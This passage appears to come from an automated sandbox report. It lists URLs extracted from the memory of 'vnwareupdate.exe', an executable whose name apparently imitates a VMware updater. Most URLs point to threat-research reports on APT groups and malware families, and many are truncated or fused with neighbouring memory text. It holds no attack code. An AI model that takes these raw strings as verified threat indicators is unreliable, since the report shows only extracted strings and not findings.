Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distributeCVE-2017-8759:
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distributeSurtr:
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238209992.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distributi
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tl
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tl0Newly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tl9Newly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tldNewly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tloNewly
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at0Attackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at1Attackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at2Attackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at4Attackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at6Attackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at7Attackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-at8Attackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-atHAttackers
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-atIPoisoning
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-atcAttackers
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-ateAttackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-atliAttackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-atpAttackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-atrAttackers
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-atuAttackers
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-e
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-e7aNew
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-e80New
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-eNew
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-ed8New
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-eng
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-engMALWARE
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-engNew
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-eraNew
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabil
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deli
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliARITCVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliCVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliENTtCVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliE_NOCVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliRt
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deli_PRICVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-delit
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobi
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-c
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-de
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/r
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rNIC
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rThe
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rail
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/resources/pdfs/fireeye-malware-supply-chain.pdf
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/resources/pdfs/fireeye-malware-supply-chain.pdfDisrupting
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/resources/pdfs/fireeye-malware-supply-chain.pdfFrom
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/resources/pdfs/white-papers/fireeye-operation-quantum-en
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/resources/pdfs/white-papers/fireeye-operation-quantum-enFrom
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/resources/pdfs/white-papers/fireeye-operation-quantum-enOPERATION
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.flashpoint-intel.com/wp-content/uploads/2017/06/Flashpoint-Jaff-Rans
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.flashpoint-intel.com/wp-content/uploads/2017/06/Flashpoint-Jaff-RansNecurs
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.flashpoint-intel.com/wp-content/uploads/2017/06/Flashpoint-Jaff-RansTurla
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-securi
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-securiA
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-securiMONSOON
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.gov.il/he/Departments/publications/reports/rand
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://www.govcert.admin.ch/blog/33/the-retefe-saga
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.govcert.admin.ch/blog/33/the-retefe-sagaT0
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.govcert.admin.ch/blog/33/the-retefe-sagaThe
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://www.guardicore.com/2016/06/the-photominer-campaign/
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.guardicore.com/2016/10/the-oracle-of-delphi-steal-your-credentials/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.hackcon.org/wp-content/uploads/2015/02/Foredrag01.pdf
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/21f68db0d05c86d382742971b8b228dc1a6b47793
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/273d718027ca1945e5aada3602f8084426936d513
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/273d718027ca1945e5aada3602f8084426936d513Andromeda
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/273d718027ca1945e5aada3602f8084426936d513New
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/273d718027ca1945e5aada3602f8084426936d513WannaCry
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/6a48b5211b622ffe49ae4e32ada72bb4d9db40576
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/788e91b3eaa67ec6f755c9c2afc682b830282b110
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/9ed5d45130547cc1df21aafae4d90e35587c0de97
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/cf1568bcf5f43e0eb44b2e813e5d31cd6f058c698
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/cf1568bcf5f43e0eb44b2e813e5d31cd6f058c698Korean
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/cf1568bcf5f43e0eb44b2e813e5d31cd6f058c698Vacation
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/d75d19693153a36a9414f418c2498d3b49016b1e4
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/fec85e6f69f1e619fc2d68c5501e4a9f2cc813bca
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/fec85e6f69f1e619fc2d68c5501e4a9f2cc813bcaShifr
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.hybrid-analysis.com/sample/fec85e6f69f1e619fc2d68c5501e4a9f2cc813bcaShortJSRat
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.icebrg.io/blog/footprints-of-fin7-iocs
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/APT28
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.its.ms.gov/services/securityAlerts/11-1-2012%20Possible%20spear%20ph
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.its.ms.gov/services/securityAlerts/11-1-2012%20Possible%20spear%20phThe
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.kudelskisecurity.com/sites/default/files/sphinx_moth_cfc_report.pdf
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.kudelskisecurity.com/sites/default/files/sphinx_moth_cfc_report.pdfAPT28
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.kudelskisecurity.com/sites/default/files/sphinx_moth_cfc_report.pdfSphinx
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.lac.co.jp/lacwatch/people/20170223_001224.html
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.lac.co.jp/lacwatch/people/20170223_001224.htmlAPT10
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.mcafee.com/hk/resources/white-papers/wp-global-energy-cyberattacks-n
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pd
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.mysonicwall.com/SonicAlert/searchresults.aspx?ev=article&id=995
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.mysonicwall.com/SonicAlert/searchresults.aspx?ev=article&ampDuqu
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/alerts/turla-group-malware#quicktabs-alert_tabs2
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/alerts/turla-group-malware#quicktabs-alert_tabs22BTurla
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/alerts/turla-group-malware#quicktabs-alert_tabs2APTurla
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/alerts/turla-group-malware#quicktabs-alert_tabs2CyTurla
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/alerts/turla-group-malware#quicktabs-alert_tabs2ECTargeted
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/alerts/turla-group-malware#quicktabs-alert_tabs2pper
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/alerts/turla-group-malware#quicktabs-alert_tabs2psTurla
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grou
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grou04Turla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grou2013
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grou2aTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grou8eTurla
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grouKIVARS
Source: vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grouTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grou_cTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20groub6Turla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20groucoTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20groudfTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20groue8Turla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grouf0Turla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20groumeTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grouroTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grouseLeviathan:
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grouseTurla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20grouw_Turla
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.novetta.com/wp-content/uploads/2014/11/HiKit.pdf
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.novetta.com/wp-content/uploads/2014/11/HiKit.pdfEpic
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.novetta.com/wp-content/uploads/2014/11/HiKit.pdfHikit
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202
Source: vnwareupdate.exe	String found in binary or memory: https://www.openssl.org/docs/faq.html
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/p
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pDing
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pOcean
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-bloss
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossOPERATION
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fil
Source: vnwareupdate.exe, 00000003.00000003.237611046.00000000038E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-atta
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attaContinued
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attaOlympic
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-
